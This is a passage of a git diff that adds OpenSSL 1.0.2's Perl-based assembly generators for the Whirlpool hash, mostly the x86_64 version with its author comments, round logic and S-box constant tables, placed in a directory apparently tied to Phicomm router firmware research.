+	&LL(0x70,0x70,0xdd,0x70,0xa7,0xad,0xe0,0xd7);
+	&LL(0xb6,0xb6,0xe2,0xb6,0xd9,0x54,0x71,0x6f);
+	&LL(0xd0,0xd0,0x67,0xd0,0xce,0xb7,0xbd,0x1e);
+	&LL(0xed,0xed,0x93,0xed,0x3b,0x7e,0xc7,0xd6);
+	&LL(0xcc,0xcc,0x17,0xcc,0x2e,0xdb,0x85,0xe2);
+	&LL(0x42,0x42,0x15,0x42,0x2a,0x57,0x84,0x68);
+	&LL(0x98,0x98,0x5a,0x98,0xb4,0xc2,0x2d,0x2c);
+	&LL(0xa4,0xa4,0xaa,0xa4,0x49,0x0e,0x55,0xed);
+	&LL(0x28,0x28,0xa0,0x28,0x5d,0x88,0x50,0x75);
+	&LL(0x5c,0x5c,0x6d,0x5c,0xda,0x31,0xb8,0x86);
+	&LL(0xf8,0xf8,0xc7,0xf8,0x93,0x3f,0xed,0x6b);
+	&LL(0x86,0x86,0x22,0x86,0x44,0xa4,0x11,0xc2);
+
+	&L(0x18,0x23,0xc6,0xe8,0x87,0xb8,0x01,0x4f);	# rc[ROUNDS]
+	&L(0x36,0xa6,0xd2,0xf5,0x79,0x6f,0x91,0x52);
+	&L(0x60,0xbc,0x9b,0x8e,0xa3,0x0c,0x7b,0x35);
+	&L(0x1d,0xe0,0xd7,0xc2,0x2e,0x4b,0xfe,0x57);
+	&L(0x15,0x77,0x37,0xe5,0x9f,0xf0,0x4a,0xda);
+	&L(0x58,0xc9,0x29,0x0a,0xb1,0xa0,0x6b,0x85);
+	&L(0xbd,0x5d,0x10,0xf4,0xcb,0x3e,0x05,0x67);
+	&L(0xe4,0x27,0x41,0x8b,0xa7,0x7d,0x95,0xd8);
+	&L(0xfb,0xee,0x7c,0x66,0xdd,0x17,0x47,0x9e);
+	&L(0xca,0x2d,0xbf,0x07,0xad,0x5a,0x83,0x33);
+
+&function_end_B("whirlpool_block_mmx");
+&asm_finish(); 
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/whrlpool/asm/wp-x86_64.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/whrlpool/asm/wp-x86_64.pl
new file mode 100644
index 0000000..5a3bdbc
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/whrlpool/asm/wp-x86_64.pl
@@ -0,0 +1,593 @@
+#!/usr/bin/env perl
+#
+# ====================================================================
+# Written by Andy Polyakov <appro@fy.chalmers.se> for the OpenSSL
+# project. Rights for redistribution and usage in source and binary
+# forms are granted according to the OpenSSL license.
+# ====================================================================
+#
+# whirlpool_block for x86_64.
+#
+# 2500 cycles per 64-byte input block on AMD64, which is *identical*
+# to 32-bit MMX version executed on same CPU. So why did I bother?
+# Well, it's faster than gcc 3.3.2 generated code by over 50%, and
+# over 80% faster than PathScale 1.4, an "ambitious" commercial
+# compiler. Furthermore it surpasses gcc 3.4.3 by 170% and Sun Studio
+# 10 - by 360%[!]... What is it with x86_64 compilers? It's not the
+# first example when they fail to generate more optimal code, when
+# I believe they had *all* chances to...
+#
+# Note that register and stack frame layout are virtually identical
+# to 32-bit MMX version, except that %r8-15 are used instead of
+# %mm0-8. You can even notice that K[i] and S[i] are loaded to
+# %eax:%ebx as pair of 32-bit values and not as single 64-bit one.
+# This is done in order to avoid 64-bit shift penalties on Intel
+# EM64T core. Speaking of which! I bet it's possible to improve
+# Opteron performance by compressing the table to 2KB and replacing
+# unaligned references with complementary rotations [which would
+# incidentally replace lea instructions], but it would definitely
+# just "kill" EM64T, because it has only 1 shifter/rotator [against
+# 3 on Opteron] and which is *unacceptably* slow with 64-bit
+# operand.
+
+$flavour = shift;
+$output  = shift;
+if ($flavour =~ /\./) { $output = $flavour; undef $flavour; }
+
+$win64=0; $win64=1 if ($flavour =~ /[nm]asm|mingw64/ || $output =~ /\.asm$/);
+
+$0 =~ m/(.*[\/\\])[^\/\\]+$/; my $dir=$1; my $xlate;
+( $xlate="${dir}x86_64-xlate.pl" and -f $xlate ) or
+( $xlate="${dir}../../perlasm/x86_64-xlate.pl" and -f $xlate) or
+die "can't locate x86_64-xlate.pl";
+
+open OUT,"| \"$^X\" $xlate $flavour $output";
+*STDOUT=*OUT;
+
+sub L() { $code.=".byte	".join(',',@_)."\n"; }
+sub LL(){ $code.=".byte	".join(',',@_).",".join(',',@_)."\n"; }
+
+@mm=("%r8","%r9","%r10","%r11","%r12","%r13","%r14","%r15");
+
+$func="whirlpool_block";
+$table=".Ltable";
+
+$code=<<___;
+.text
+
+.globl	$func
+.type	$func,\@function,3
+.align	16
+$func:
+	push	%rbx
+	push	%rbp
+	push	%r12
+	push	%r13
+	push	%r14
+	push	%r15
+
+	mov	%rsp,%r11
+	sub	\$128+40,%rsp
+	and	\$-64,%rsp
+
+	lea	128(%rsp),%r10
+	mov	%rdi,0(%r10)		# save parameter block
+	mov	%rsi,8(%r10)
+	mov	%rdx,16(%r10)
+	mov	%r11,32(%r10)		# saved stack pointer
+.Lprologue:
+
+	mov	%r10,%rbx
+	lea	$table(%rip),%rbp
+
+	xor	%rcx,%rcx
+	xor	%rdx,%rdx
+___
+for($i=0;$i<8;$i++) { $code.="mov $i*8(%rdi),@mm[$i]\n"; }	# L=H
+$code.=".Louterloop:\n";
+for($i=0;$i<8;$i++) { $code.="mov @mm[$i],$i*8(%rsp)\n"; }	# K=L
+for($i=0;$i<8;$i++) { $code.="xor $i*8(%rsi),@mm[$i]\n"; }	# L^=inp
+for($i=0;$i<8;$i++) { $code.="mov @mm[$i],64+$i*8(%rsp)\n"; }	# S=L
+$code.=<<___;
+	xor	%rsi,%rsi
+	mov	%rsi,24(%rbx)		# zero round counter
+	jmp	.Lround
+.align	16
+.Lround:
+	mov	4096(%rbp,%rsi,8),@mm[0]	# rc[r]
+	mov	0(%rsp),%eax
+	mov	4(%rsp),%ebx
+	movz	%al,%ecx
+	movz	%ah,%edx
+___
+for($i=0;$i<8;$i++) {
+    my $func = ($i==0)? "mov" : "xor";
+    $code.=<<___;
+	shr	\$16,%eax
+	lea	(%rcx,%rcx),%rsi
+	movz	%al,%ecx
+	lea	(%rdx,%rdx),%rdi
+	movz	%ah,%edx
+	xor	0(%rbp,%rsi,8),@mm[0]
+	$func	7(%rbp,%rdi,8),@mm[1]
+	mov	$i*8+8(%rsp),%eax		# ($i+1)*8
+	lea	(%rcx,%rcx),%rsi
+	movz	%bl,%ecx
+	lea	(%rdx,%rdx),%rdi
+	movz	%bh,%edx
+	$func	6(%rbp,%rsi,8),@mm[2]
+	$func	5(%rbp,%rdi,8),@mm[3]
+	shr	\$16,%ebx
+	lea	(%rcx,%rcx),%rsi
+	movz	%bl,%ecx
+	lea	(%rdx,%rdx),%rdi
+	movz	%bh,%edx
+	$func	4(%rbp,%rsi,8),@mm[4]
+	$func	3(%rbp,%rdi,8),@mm[5]
+	mov	$i*8+8+4(%rsp),%ebx		# ($i+1)*8+4
+	lea	(%rcx,%rcx),%rsi
+	movz	%al,%ecx
+	lea	(%rdx,%rdx),%rdi
+	movz	%ah,%edx
+	$func	2(%rbp,%rsi,8),@mm[6]
+	$func	1(%rbp,%rdi,8),@mm[7]
+___
+    push(@mm,shift(@mm));
+}
+for($i=0;$i<8;$i++) { $code.="mov @mm[$i],$i*8(%rsp)\n"; }	# K=L
+for($i=0;$i<8;$i++) {
+    $code.=<<___;
+	shr	\$16,%eax
+	lea	(%rcx,%rcx),%rsi
+	movz	%al,%ecx
+	lea	(%rdx,%rdx),%rdi
+	movz	%ah,%edx
+	xor	0(%rbp,%rsi,8),@mm[0]
+	xor	7(%rbp,%rdi,8),@mm[1]
+	`"mov	64+$i*8+8(%rsp),%eax"	if($i<7);`	# 64+($i+1)*8
+	lea	(%rcx,%rcx),%rsi
+	movz	%bl,%ecx
+	lea	(%rdx,%rdx),%rdi
+	movz	%bh,%edx
+	xor	6(%rbp,%rsi,8),@mm[2]
+	xor	5(%rbp,%rdi,8),@mm[3]
+	shr	\$16,%ebx
+	lea	(%rcx,%rcx),%rsi
+	movz	%bl,%ecx
+	lea	(%rdx,%rdx),%rdi
+	movz	%bh,%edx
+	xor	4(%rbp,%rsi,8),@mm[4]
+	xor	3(%rbp,%rdi,8),@mm[5]
+	`"mov	64+$i*8+8+4(%rsp),%ebx"	if($i<7);`	# 64+($i+1)*8+4
+	lea	(%rcx,%rcx),%rsi
+	movz	%al,%ecx
+	lea	(%rdx,%rdx),%rdi
+	movz	%ah,%edx
+	xor	2(%rbp,%rsi,8),@mm[6]
+	xor	1(%rbp,%rdi,8),@mm[7]
+___
+    push(@mm,shift(@mm));
+}
+$code.=<<___;
+	lea	128(%rsp),%rbx
+	mov	24(%rbx),%rsi		# pull round counter
+	add	\$1,%rsi
+	cmp	\$10,%rsi
+	je	.Lroundsdone
+
+	mov	%rsi,24(%rbx)		# update round counter
+___
+for($i=0;$i<8;$i++) { $code.="mov @mm[$i],64+$i*8(%rsp)\n"; }	# S=L
+$code.=<<___;
+	jmp	.Lround
+.align	16
+.Lroundsdone:
+	mov	0(%rbx),%rdi		# reload argument block
+	mov	8(%rbx),%rsi
+	mov	16(%rbx),%rax
+___
+for($i=0;$i<8;$i++) { $code.="xor $i*8(%rsi),@mm[$i]\n"; }	# L^=inp
+for($i=0;$i<8;$i++) { $code.="xor $i*8(%rdi),@mm[$i]\n"; }	# L^=H
+for($i=0;$i<8;$i++) { $code.="mov @mm[$i],$i*8(%rdi)\n"; }	# H=L
+$code.=<<___;
+	lea	64(%rsi),%rsi		# inp+=64
+	sub	\$1,%rax		# num--
+	jz	.Lalldone
+	mov	%rsi,8(%rbx)		# update parameter block
+	mov	%rax,16(%rbx)
+	jmp	.Louterloop
+.Lalldone:
+	mov	32(%rbx),%rsi		# restore saved pointer
+	mov	(%rsi),%r15
+	mov	8(%rsi),%r14
+	mov	16(%rsi),%r13
+	mov	24(%rsi),%r12
+	mov	32(%rsi),%rbp
+	mov	40(%rsi),%rbx
+	lea	48(%rsi),%rsp
+.Lepilogue:
+	ret
+.size	$func,.-$func
+
+.align	64
+.type	$table,\@object
+$table:
+___
+	&LL(0x18,0x18,0x60,0x18,0xc0,0x78,0x30,0xd8);
+	&LL(0x23,0x23,0x8c,0x23,0x05,0xaf,0x46,0x26);
+	&LL(0xc6,0xc6,0x3f,0xc6,0x7e,0xf9,0x91,0xb8);
+	&LL(0xe8,0xe8,0x87,0xe8,0x13,0x6f,0xcd,0xfb);
+	&LL(0x87,0x87,0x26,0x87,0x4c,0xa1,0x13,0xcb);
+	&LL(0xb8,0xb8,0xda,0xb8,0xa9,0x62,0x6d,0x11);
+	&LL(0x01,0x01,0x04,0x01,0x08,0x05,0x02,0x09);
+	&LL(0x4f,0x4f,0x21,0x4f,0x42,0x6e,0x9e,0x0d);
+	&LL(0x36,0x36,0xd8,0x36,0xad,0xee,0x6c,0x9b);
+	&LL(0xa6,0xa6,0xa2,0xa6,0x59,0x04,0x51,0xff);
+	&LL(0xd2,0xd2,0x6f,0xd2,0xde,0xbd,0xb9,0x0c);
+	&LL(0xf5,0xf5,0xf3,0xf5,0xfb,0x06,0xf7,0x0e);
+	&LL(0x79,0x79,0xf9,0x79,0xef,0x80,0xf2,0x96);
+	&LL(0x6f,0x6f,0xa1,0x6f,0x5f,0xce,0xde,0x30);
+	&LL(0x91,0x91,0x7e,0x91,0xfc,0xef,0x3f,0x6d);
+	&LL(0x52,0x52,0x55,0x52,0xaa,0x07,0xa4,0xf8);
+	&LL(0x60,0x60,0x9d,0x60,0x27,0xfd,0xc0,0x47);
+	&LL(0xbc,0xbc,0xca,0xbc,0x89,0x76,0x65,0x35);
+	&LL(0x9b,0x9b,0x56,0x9b,0xac,0xcd,0x2b,0x37);
+	&LL(0x8e,0x8e,0x02,0x8e,0x04,0x8c,0x01,0x8a);
+	&LL(0xa3,0xa3,0xb6,0xa3,0x71,0x15,0x5b,0xd2);
+	&LL(0x0c,0x0c,0x30,0x0c,0x60,0x3c,0x18,0x6c);
+	&LL(0x7b,0x7b,0xf1,0x7b,0xff,0x8a,0xf6,0x84);
+	&LL(0x35,0x35,0xd4,0x35,0xb5,0xe1,0x6a,0x80);
+	&LL(0x1d,0x1d,0x74,0x1d,0xe8,0x69,0x3a,0xf5);
+	&LL(0xe0,0xe0,0xa7,0xe0,0x53,0x47,0xdd,0xb3);
+	&LL(0xd7,0xd7,0x7b,0xd7,0xf6,0xac,0xb3,0x21);
+	&LL(0xc2,0xc2,0x2f,0xc2,0x5e,0xed,0x99,0x9c);
+	&LL(0x2e,0x2e,0xb8,0x2e,0x6d,0x96,0x5c,0x43);
+	&LL(0x4b,0x4b,0x31,0x4b,0x62,0x7a,0x96,0x29);
+	&LL(0xfe,0xfe,0xdf,0xfe,0xa3,0x21,0xe1,0x5d);
+	&LL(0x57,0x57,0x41,0x57,0x82,0x16,0xae,0xd5);
+	&LL(0x15,0x15,0x54,0x15,0xa8,0x41,0x2a,0xbd);
+	&LL(0x77,0x77,0xc1,0x77,0x9f,0xb6,0xee,0xe8);
+	&LL(0x37,0x37,0xdc,0x37,0xa5,0xeb,0x6e,0x92);
+	&LL(0xe5,0xe5,0xb3,0xe5,0x7b,0x56,0xd7,0x9e);
+	&LL(0x9f,0x9f,0x46,0x9f,0x8c,0xd9,0x23,0x13);
+	&LL(0xf0,0xf0,0xe7,0xf0,0xd3,0x17,0xfd,0x23);
+	&LL(0x4a,0x4a,0x35,0x4a,0x6a,0x7f,0x94,0x20);
+	&LL(0xda,0xda,0x4f,0xda,0x9e,0x95,0xa9,0x44);
+	&LL(0x58,0x58,0x7d,0x58,0xfa,0x25,0xb0,0xa2);
+	&LL(0xc9,0xc9,0x03,0xc9,0x06,0xca,0x8f,0xcf);
+	&LL(0x29,0x29,0xa4,0x29,0x55,0x8d,0x52,0x7c);
+	&LL(0x0a,0x0a,0x28,0x0a,0x50,0x22,0x14,0x5a);
+	&LL(0xb1,0xb1,0xfe,0xb1,0xe1,0x4f,0x7f,0x50);
+	&LL(0xa0,0xa0,0xba,0xa0,0x69,0x1a,0x5d,0xc9);
+	&LL(0x6b,0x6b,0xb1,0x6b,0x7f,0xda,0xd6,0x14);
+	&LL(0x85,0x85,0x2e,0x85,0x5c,0xab,0x17,0xd9);
+	&LL(0xbd,0xbd,0xce,0xbd,0x81,0x73,0x67,0x3c);
+	&LL(0x5d,0x5d,0x69,0x5d,0xd2,0x34,0xba,0x8f);
+	&LL(0x10,0x10,0x40,0x10,0x80,0x50,0x20,0x90);
+	&LL(0xf4,0xf4,0xf7,0xf4,0xf3,0x03,0xf5,0x07);
+	&LL(0xcb,0xcb,0x0b,0xcb,0x16,0xc0,0x8b,0xdd);
+	&LL(0x3e,0x3e,0xf8,0x3e,0xed,0xc6,0x7c,0xd3);
+	&LL(0x05,0x05,0x14,0x05,0x28,0x11,0x0a,0x2d);
+	&LL(0x67,0x67,0x81,0x67,0x1f,0xe6,0xce,0x78);
+	&LL(0xe4,0xe4,0xb7,0xe4,0x73,0x53,0xd5,0x97);
+	&LL(0x27,0x27,0x9c,0x27,0x25,0xbb,0x4e,0x02);
+	&LL(0x41,0x41,0x19,0x41,0x32,0x58,0x82,0x73);
+	&LL(0x8b,0x8b,0x16,0x8b,0x2c,0x9d,0x0b,0xa7);
+	&LL(0xa7,0xa7,0xa6,0xa7,0x51,0x01,0x53,0xf6);
+	&LL(0x7d,0x7d,0xe9,0x7d,0xcf,0x94,0xfa,0xb2);
+	&LL(0x95,0x95,0x6e,0x95,0xdc,0xfb,0x37,0x49);
+	&LL(0xd8,0xd8,0x47,0xd8,0x8e,0x9f,0xad,0x56);
+	&LL(0xfb,0xfb,0xcb,0xfb,0x8b,0x30,0xeb,0x70);
+	&LL(0xee,0xee,0x9f,0xee,0x23,0x71,0xc1,0xcd);
+	&LL(0x7c,0x7c,0xed,0x7c,0xc7,0x91,0xf8,0xbb);
+	&LL(0x66,0x66,0x85,0x66,0x17,0xe3,0xcc,0x71);
+	&LL(0xdd,0xdd,0x53,0xdd,0xa6,0x8e,0xa7,0x7b);
+	&LL(0x17,0x17,0x5c,0x17,0xb8,0x4b,0x2e,0xaf);
+	&LL(0x47,0x47,0x01,0x47,0x02,0x46,0x8e,0x45);
+	&LL(0x9e,0x9e,0x42,0x9e,0x84,0xdc,0x21,0x1a);
+	&LL(0xca,0xca,0x0f,0xca,0x1e,0xc5,0x89,0xd4);
+	&LL(0x2d,0x2d,0xb4,0x2d,0x75,0x99,0x5a,0x58);
+	&LL(0xbf,0xbf,0xc6,0xbf,0x91,0x79,0x63,0x2e);
+	&LL(0x07,0x07,0x1c,0x07,0x38,0x1b,0x0e,0x3f);
+	&LL(0xad,0xad,0x8e,0xad,0x01,0x23,0x47,0xac);
+	&LL(0x5a,0x5a,0x75,0x5a,0xea,0x2f,0xb4,0xb0);
+	&LL(0x83,0x83,0x36,0x83,0x6c,0xb5,0x1b,0xef);
+	&LL(0x33,0x33,0xcc,0x33,0x85,0xff,0x66,0xb6);
+	&LL(0x63,0x63,0x91,0x63,0x3f,0xf2,0xc6,0x5c);
+	&LL(0x02,0x02,0x08,0x02,0x10,0x0a,0x04,0x12);
+	&LL(0xaa,0xaa,0x92,0xaa,0x39,0x38,0x49,0x93);
+	&LL(0x71,0x71,0xd9,0x71,0xaf,0xa8,0xe2,0xde);
+	&LL(0xc8,0xc8,0x07,0xc8,0x0e,0xcf,0x8d,0xc6);
+	&LL(0x19,0x19,0x64,0x19,0xc8,0x7d,0x32,0xd1);
+	&LL(0x49,0x49,0x39,0x49,0x72,0x70,0x92,0x3b);
+	&LL(0xd9,0xd9,0x43,0xd9,0x86,0x9a,0xaf,0x5f);
+	&LL(0xf2,0xf2,0xef,0xf2,0xc3,0x1d,0xf9,0x31);
+	&LL(0xe3,0xe3,0xab,0xe3,0x4b,0x48,0xdb,0xa8);
+	&LL(0x5b,0x5b,0x71,0x5b,0xe2,0x2a,0xb6,0xb9);
+	&LL(0x88,0x88,0x1a,0x88,0x34,0x92,0x0d,0xbc);
+	&LL(0x9a,0x9a,0x52,0x9a,0xa4,0xc8,0x29,0x3e);
+	&LL(0x26,0x26,0x98,0x26,0x2d,0xbe,0x4c,0x0b);
+	&LL(0x32,0x32,0xc8,0x32,0x8d,0xfa,0x64,0xbf);
+	&LL(0xb0,0xb0,0xfa,0xb0,0xe9,0x4a,0x7d,0x59);
+	&LL(0xe9,0xe9,0x83,0xe9,0x1b,0x6a,0xcf,0xf2);
+	&LL(0x0f,0x0f,0x3c,0x0f,0x78,0x33,0x1e,0x77);
+	&LL(0xd5,0xd5,0x73,0xd5,0xe6,0xa6,0xb7,0x33);
+	&LL(0x80,0x80,0x3a,0x80,0x74,0xba,0x1d,0xf4);
+	&LL(0xbe,0xbe,0xc2,0xbe,0x99,0x7c,0x61,0x27);
+	&LL(0xcd,0xcd,0x13,0xcd,0x26,0xde,0x87,0xeb);
+	&LL(0x34,0x34,0xd0,0x34,0xbd,0xe4,0x68,0x89);
+	&LL(0x48,0x48,0x3d,0x48,0x7a,0x75,0x90,0x32);
+	&LL(0xff,0xff,0xdb,0xff,0xab,0x24,0xe3,0x54);
+	&LL(0x7a,0x7a,0xf5,0x7a,0xf7,0x8f,0xf4,0x8d);
+	&LL(0x90,0x90,0x7a,0x90,0xf4,0xea,0x3d,0x64);
+	&LL(0x5f,0x5f,0x61,0x5f,0xc2,0x3e,0xbe,0x9d);
+	&LL(0x20,0x20,0x80,0x20,0x1d,0xa0,0x40,0x3d);
+	&LL(0x68,0x68,0xbd,0x68,0x67,0xd5,0xd0,0x0f);
+	&LL(0x1a,0x1a,0x68,0x1a,0xd0,0x72,0x34,0xca);
+	&LL(0xae,0xae,0x82,0xae,0x19,0x2c,0x41,0xb7);
+	&LL(0xb4,0xb4,0xea,0xb4,0xc9,0x5e,0x75,0x7d);
+	&LL(0x54,0x54,0x4d,0x54,0x9a,0x19,0xa8,0xce);
+	&LL(0x93,0x93,0x76,0x93,0xec,0xe5,0x3b,0x7f);
+	&LL(0x22,0x22,0x88,0x22,0x0d,0xaa,0x44,0x2f);
+	&LL(0x64,0x64,0x8d,0x64,0x07,0xe9,0xc8,0x63);
+	&LL(0xf1,0xf1,0xe3,0xf1,0xdb,0x12,0xff,0x2a);
+	&LL(0x73,0x73,0xd1,0x73,0xbf,0xa2,0xe6,0xcc);
+	&LL(0x12,0x12,0x48,0x12,0x90,0x5a,0x24,0x82);
+	&LL(0x40,0x40,0x1d,0x40,0x3a,0x5d,0x80,0x7a);
+	&LL(0x08,0x08,0x20,0x08,0x40,0x28,0x10,0x48);
+	&LL(0xc3,0xc3,0x2b,0xc3,0x56,0xe8,0x9b,0x95);
+	&LL(0xec,0xec,0x97,0xec,0x33,0x7b,0xc5,0xdf);
+	&LL(0xdb,0xdb,0x4b,0xdb,0x96,0x90,0xab,0x4d);
+	&LL(0xa1,0xa1,0xbe,0xa1,0x61,0x1f,0x5f,0xc0);
+	&LL(0x8d,0x8d,0x0e,0x8d,0x1c,0x83,0x07,0x91);
+	&LL(0x3d,0x3d,0xf4,0x3d,0xf5,0xc9,0x7a,0xc8);
+	&LL(0x97,0x97,0x66,0x97,0xcc,0xf1,0x33,0x5b);
+	&LL(0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00);
+	&LL(0xcf,0xcf,0x1b,0xcf,0x36,0xd4,0x83,0xf9);
+	&LL(0x2b,0x2b,0xac,0x2b,0x45,0x87,0x56,0x6e);
+	&LL(0x76,0x76,0xc5,0x76,0x97,0xb3,0xec,0xe1);
+	&LL(0x82,0x82,0x32,0x82,0x64,0xb0,0x19,0xe6);
+	&LL(0xd6,0xd6,0x7f,0xd6,0xfe,0xa9,0xb1,0x28);
+	&LL(0x1b,0x1b,0x6c,0x1b,0xd8,0x77,0x36,0xc3);
+	&LL(0xb5,0xb5,0xee,0xb5,0xc1,0x5b,0x77,0x74);
+	&LL(0xaf,0xaf,0x86,0xaf,0x11,0x29,0x43,0xbe);
+	&LL(0x6a,0x6a,0xb5,0x6a,0x77,0xdf,0xd4,0x1d);
+	&LL(0x50,0x50,0x5d,0x50,0xba,0x0d,0xa0,0xea);
+	&LL(0x45,0x45,0x09,0x45,0x12,0x4c,0x8a,0x57);
+	&LL(0xf3,0xf3,0xeb,0xf3,0xcb,0x18,0xfb,0x38);
+	&LL(0x30,0x30,0xc0,0x30,0x9d,0xf0,0x60,0xad);
+	&LL(0xef,0xef,0x9b,0xef,0x2b,0x74,0xc3,0xc4);
+	&LL(0x3f,0x3f,0xfc,0x3f,0xe5,0xc3,0x7e,0xda);
+	&LL(0x55,0x55,0x49,0x55,0x92,0x1c,0xaa,0xc7);
+	&LL(0xa2,0xa2,0xb2,0xa2,0x79,0x10,0x59,0xdb);
+	&LL(0xea,0xea,0x8f,0xea,0x03,0x65,0xc9,0xe9);
+	&LL(0x65,0x65,0x89,0x65,0x0f,0xec,0xca,0x6a);
+	&LL(0xba,0xba,0xd2,0xba,0xb9,0x68,0x69,0x03);
+	&LL(0x2f,0x2f,0xbc,0x2f,0x65,0x93,0x5e,0x4a);
+	&LL(0xc0,0xc0,0x27,0xc0,0x4e,0xe7,0x9d,0x8e);
+	&LL(0xde,0xde,0x5f,0xde,0xbe,0x81,0xa1,0x60);
+	&LL(0x1c,0x1c,0x70,0x1c,0xe0,0x6c,0x38,0xfc);
+	&LL(0xfd,0xfd,0xd3,0xfd,0xbb,0x2e,0xe7,0x46);
+	&LL(0x4d,0x4d,0x29,0x4d,0x52,0x64,0x9a,0x1f);
+	&LL(0x92,0x92,0x72,0x92,0xe4,0xe0,0x39,0x76);
+	&LL(0x75,0x75,0xc9,0x75,0x8f,0xbc,0xea,0xfa);
+	&LL(0x06,0x06,0x18,0x06,0x30,0x1e,0x0c,0x36);
+	&LL(0x8a,0x8a,0x12,0x8a,0x24,0x98,0x09,0xae);
+	&LL(0xb2,0xb2,0xf2,0xb2,0xf9,0x40,0x79,0x4b);
+	&LL(0xe6,0xe6,0xbf,0xe6,0x63,0x59,0xd1,0x85);
+	&LL(0x0e,0x0e,0x38,0x0e,0x70,0x36,0x1c,0x7e);
+	&LL(0x1f,0x1f,0x7c,0x1f,0xf8,0x63,0x3e,0xe7);
+	&LL(0x62,0x62,0x95,0x62,0x37,0xf7,0xc4,0x55);
+	&LL(0xd4,0xd4,0x77,0xd4,0xee,0xa3,0xb5,0x3a);
+	&LL(0xa8,0xa8,0x9a,0xa8,0x29,0x32,0x4d,0x81);
+	&LL(0x96,0x96,0x62,0x96,0xc4,0xf4,0x31,0x52);
+	&LL(0xf9,0xf9,0xc3,0xf9,0x9b,0x3a,0xef,0x62);
+	&LL(0xc5,0xc5,0x33,0xc5,0x66,0xf6,0x97,0xa3);
+	&LL(0x25,0x25,0x94,0x25,0x35,0xb1,0x4a,0x10);
+	&LL(0x59,0x59,0x79,0x59,0xf2,0x20,0xb2,0xab);
+	&LL(0x84,0x84,0x2a,0x84,0x54,0xae,0x15,0xd0);
+	&LL(0x72,0x72,0xd5,0x72,0xb7,0xa7,0xe4,0xc5);
+	&LL(0x39,0x39,0xe4,0x39,0xd5,0xdd,0x72,0xec);
+	&LL(0x4c,0x4c,0x2d,0x4c,0x5a,0x61,0x98,0x16);
+	&LL(0x5e,0x5e,0x65,0x5e,0xca,0x3b,0xbc,0x94);
+	&LL(0x78,0x78,0xfd,0x78,0xe7,0x85,0xf0,0x9f);
+	&LL(0x38,0x38,0xe0,0x38,0xdd,0xd8,0x70,0xe5);
+	&LL(0x8c,0x8c,0x0a,0x8c,0x14,0x86,0x05,0x98);
+	&LL(0xd1,0xd1,0x63,0xd1,0xc6,0xb2,0xbf,0x17);
+	&LL(0xa5,0xa5,0xae,0xa5,0x41,0x0b,0x57,0xe4);
+	&LL(0xe2,0xe2,0xaf,0xe2,0x43,0x4d,0xd9,0xa1);
+	&LL(0x61,0x61,0x99,0x61,0x2f,0xf8,0xc2,0x4e);
+	&LL(0xb3,0xb3,0xf6,0xb3,0xf1,0x45,0x7b,0x42);
+	&LL(0x21,0x21,0x84,0x21,0x15,0xa5,0x42,0x34);
+	&LL(0x9c,0x9c,0x4a,0x9c,0x94,0xd6,0x25,0x08);
+	&LL(0x1e,0x1e,0x78,0x1e,0xf0,0x66,0x3c,0xee);
+	&LL(0x43,0x43,0x11,0x43,0x22,0x52,0x86,0x61);
+	&LL(0xc7,0xc7,0x3b,0xc7,0x76,0xfc,0x93,0xb1);
+	&LL(0xfc,0xfc,0xd7,0xfc,0xb3,0x2b,0xe5,0x4f);
+	&LL(0x04,0x04,0x10,0x04,0x20,0x14,0x08,0x24);
+	&LL(0x51,0x51,0x59,0x51,0xb2,0x08,0xa2,0xe3);
+	&LL(0x99,0x99,0x5e,0x99,0xbc,0xc7,0x2f,0x25);
+	&LL(0x6d,0x6d,0xa9,0x6d,0x4f,0xc4,0xda,0x22);
+	&LL(0x0d,0x0d,0x34,0x0d,0x68,0x39,0x1a,0x65);
+	&LL(0xfa,0xfa,0xcf,0xfa,0x83,0x35,0xe9,0x79);
+	&LL(0xdf,0xdf,0x5b,0xdf,0xb6,0x84,0xa3,0x69);
+	&LL(0x7e,0x7e,0xe5,0x7e,0xd7,0x9b,0xfc,0xa9);
+	&LL(0x24,0x24,0x90,0x24,0x3d,0xb4,0x48,0x19);
+	&LL(0x3b,0x3b,0xec,0x3b,0xc5,0xd7,0x76,0xfe);
+	&LL(0xab,0xab,0x96,0xab,0x31,0x3d,0x4b,0x9a);
+	&LL(0xce,0xce,0x1f,0xce,0x3e,0xd1,0x81,0xf0);
+	&LL(0x11,0x11,0x44,0x11,0x88,0x55,0x22,0x99);
+	&LL(0x8f,0x8f,0x06,0x8f,0x0c,0x89,0x03,0x83);
+	&LL(0x4e,0x4e,0x25,0x4e,0x4a,0x6b,0x9c,0x04);
+	&LL(0xb7,0xb7,0xe6,0xb7,0xd1,0x51,0x73,0x66);
+	&LL(0xeb,0xeb,0x8b,0xeb,0x0b,0x60,0xcb,0xe0);
+	&LL(0x3c,0x3c,0xf0,0x3c,0xfd,0xcc,0x78,0xc1);
+	&LL(0x81,0x81,0x3e,0x81,0x7c,0xbf,0x1f,0xfd);
+	&LL(0x94,0x94,0x6a,0x94,0xd4,0xfe,0x35,0x40);
+	&LL(0xf7,0xf7,0xfb,0xf7,0xeb,0x0c,0xf3,0x1c);
+	&LL(0xb9,0xb9,0xde,0xb9,0xa1,0x67,0x6f,0x18);
+	&LL(0x13,0x13,0x4c,0x13,0x98,0x5f,0x26,0x8b);
+	&LL(0x2c,0x2c,0xb0,0x2c,0x7d,0x9c,0x58,0x51);
+	&LL(0xd3,0xd3,0x6b,0xd3,0xd6,0xb8,0xbb,0x05);
+	&LL(0xe7,0xe7,0xbb,0xe7,0x6b,0x5c,0xd3,0x8c);
+	&LL(0x6e,0x6e,0xa5,0x6e,0x57,0xcb,0xdc,0x39);
+	&LL(0xc4,0xc4,0x37,0xc4,0x6e,0xf3,0x95,0xaa);
+	&LL(0x03,0x03,0x0c,0x03,0x18,0x0f,0x06,0x1b);
+	&LL(0x56,0x56,0x45,0x56,0x8a,0x13,0xac,0xdc);
+	&LL(0x44,0x44,0x0d,0x44,0x1a,0x49,0x88,0x5e);
+	&LL(0x7f,0x7f,0xe1,0x7f,0xdf,0x9e,0xfe,0xa0);
+	&LL(0xa9,0xa9,0x9e,0xa9,0x21,0x37,0x4f,0x88);
+	&LL(0x2a,0x2a,0xa8,0x2a,0x4d,0x82,0x54,0x67);
+	&LL(0xbb,0xbb,0xd6,0xbb,0xb1,0x6d,0x6b,0x0a);
+	&LL(0xc1,0xc1,0x23,0xc1,0x46,0xe2,0x9f,0x87);
